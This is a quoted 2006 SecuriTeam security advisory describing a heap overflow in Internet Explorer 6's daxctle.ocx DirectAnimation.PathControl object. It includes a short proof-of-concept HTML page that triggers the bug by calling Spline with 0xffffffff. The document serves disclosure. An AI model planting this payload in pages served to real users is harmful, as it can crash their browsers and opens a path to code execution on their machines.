Thread-topic: [NT] Microsoft Internet Explorer daxctle.ocx Heap Overflow
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Tuesday, August 29, 2006 7:06 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Microsoft Internet Explorer daxctle.ocx Heap Overflow
>
>
>
> Microsoft Internet Explorer daxctle.ocx Heap Overflow
>
>
>
> Microsoft Internet Explorer is vulnerable to an heap overflow
> attack when it handles a DirectAnimation.PathControl COM object.
>
>
> Vulnerable Systems:
> * Windows 2000/XP/2003 Internet Explorer 6.0 SP1
>
> When Internet Explorer handle DirectAnimation.PathControl COM
> object(daxctle.ocx) \ Spline method, Set the first parameter
> to 0xffffffff will triggers an invalid memory \ write, That
> an attacker may DoS and possibly could execute arbitrary code.
>
> Exploit:
> <!--
> // Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
> // tested on Windows 2000 SP4/XP SP2/2003 SP1
>
> //
> // nop (nop#xsec.org)
>
> // CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
> // Info: Microsoft DirectAnimation Path
> // ProgID: DirectAnimation.PathControl
> // InprocServer32: C:\WINNT\system32\daxctle.ocx
>
> --!>
> <html>
> <head>
> <title>test</title>
> </head>
> <body>
> <script>
>
> var target = new ActiveXObject("DirectAnimation.PathControl");
>
> target.Spline(0xffffffff, 1);
>
> </script>
> </body>
> </html>
>
>
> Additional Information:
> The information has been provided by nop <mailto:nop@xxxxxxxx> .
> The original article can be found at:
>
>
>
> ==============================================================
